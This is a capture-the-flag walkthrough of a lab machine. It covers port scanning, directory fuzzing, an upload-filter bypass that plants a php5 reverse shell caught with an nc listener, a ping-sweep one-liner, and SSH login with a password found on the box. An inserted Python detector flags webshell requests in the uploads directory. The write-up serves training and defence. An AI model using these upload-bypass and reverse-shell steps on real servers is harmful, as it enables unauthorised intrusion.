┌─[✗]─[gabrielle@parrot]─[~]
└──╼ $ sudo nmap -p- -sV -sC 10.10.10.109
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-10-26 20:05 EDT
Nmap scan report for 10.10.10.109
Host is up (0.057s latency).
Not shown: 65533 closed tcp ports (reset)
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.4 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   2048 a6:9d:0f:7d:73:75:bb:a8:94:0a:b7:e3:fe:1f:24:f4 (RSA)
|   256 2c:7c:34:eb:3a:eb:04:03:ac:48:28:54:09:74:3d:27 (ECDSA)
|_  256 98:42:5f:ad:87:22:92:6d:72:e6:66:6c:82:c1:09:83 (ED25519)
80/tcp open  http    Apache httpd 2.4.18 ((Ubuntu))
|_http-title: Site doesn't have a title (text/html; charset=UTF-8).
|_http-server-header: Apache/2.4.18 (Ubuntu)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 21.91 seconds
Port 80
We have this page
Wfuzz on the web root turned up nothing useful, but the page mentioned a customer.
If we try to go to /sparklays we get a Forbidden, which means the directory exists, so we can run wfuzz again against it.
I had to run wfuzz multiple times, but here are the commands and the interesting results I got:
In the meantime, wfuzz was quite a pain, so I tried gobuster, which I usually prefer (but I wanted to try out wfuzz lol).
And I got this
So from these we have:
On login.php we get an access denied
But on admin.php we get a login page
Login
I tried bruteforcing along with possible weak passwords but did not get anywhere.
On /design/design.html we get this
And if we click on change logo we end up here, so we can play with the upload function.
change logo
I tried a few file extensions and got it working with the php5 extension.
So I uploaded php-reverse-shell.php5 to the server after modifying the file with my IP address.
I set up my listener: nc -nlvp 4444
And then I accessed this page from the browser (remember the uploads directory we found before)
http://10.10.10.109/sparklays/design/uploads/php-reverse-shell.php5
And I got a shell as www-data:
Shell
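As an added example that is not part of the original writeup: a small Python detector that walks Apache access log lines and flags requests for server-side-executable files under the uploads directory, which is what the php5 upload above looks like from the server side. The log lines are constructed samples; only the uploads path comes from the URL above.

```python
import re

# Extensions Apache's PHP handler is commonly mapped to; a file whose name
# contains any of them (not only as the last extension) deserves a look,
# because mod_mime with AddHandler evaluates every dotted component.
EXEC_EXTENSIONS = {"php", "php3", "php4", "php5", "php7", "phtml", "phar"}

# Combined log format: ip ident user [ts] "METHOD path proto" status ...
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3})'
)

# Constructed sample log lines (not captured from the real box).
SAMPLE_LOG = """\
10.10.14.5 - - [26/Oct/2024:20:31:40 -0400] "GET /sparklays/design/uploads/php-reverse-shell.php5 HTTP/1.1" 200 0 "-" "Mozilla/5.0"
10.10.14.5 - - [26/Oct/2024:20:32:10 -0400] "GET /sparklays/design/uploads/logo.png HTTP/1.1" 200 8214 "-" "Mozilla/5.0"
10.10.14.5 - - [26/Oct/2024:20:33:00 -0400] "GET /sparklays/admin.php HTTP/1.1" 200 1337 "-" "Mozilla/5.0"
10.10.14.5 - - [26/Oct/2024:20:34:00 -0400] "GET /sparklays/design/uploads/shell.phtml?cmd=id HTTP/1.1" 404 213 "-" "curl/8.0"
"""


def find_upload_webshell_hits(log_text, upload_dir="/sparklays/design/uploads/"):
    """Return one dict per request for an executable-looking file under upload_dir."""
    hits = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue  # not a combined-format line; skip rather than crash
        path = m.group("path").split("?", 1)[0]  # drop query string
        if not path.startswith(upload_dir):
            continue  # admin.php etc. live outside the upload directory
        name = path.rsplit("/", 1)[-1]
        exts = {e.lower() for e in name.split(".")[1:]}
        if exts & EXEC_EXTENSIONS:
            hits.append({"ip": m.group("ip"), "ts": m.group("ts"),
                         "path": path, "status": int(m.group("status"))})
    return hits


if __name__ == "__main__":
    for hit in find_upload_webshell_hits(SAMPLE_LOG):
        print(f"{hit['ts']} {hit['ip']} -> {hit['path']} ({hit['status']})")
```

A 200 on such a request means the file was served (and, with a PHP handler, executed); a 404 still records the attempt. Flagging the upload itself needs the application's own log, since the POST goes to the upload handler rather than the uploads directory.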
I chose to play with this machine because I wanted to practice pivoting.
So let's check what we have available here in terms of network with arp -a. If for some reason arp -a does not work, a friend of mine uses a cool one-liner for a ping sweep:
for i in {1..254} ;do (ping 192.168.122.$i -c 1 -w 5 >/dev/null && echo "192.168.122.$i" &) ;done
But here arp -a works and we get this:
But first let's see if we can move to a user. If we ls /home we have 2 users: dave and alex.
If we go to dave's Desktop we find this.
So let's try to ssh as dave (with the password we found: Dav3therav3123). It works: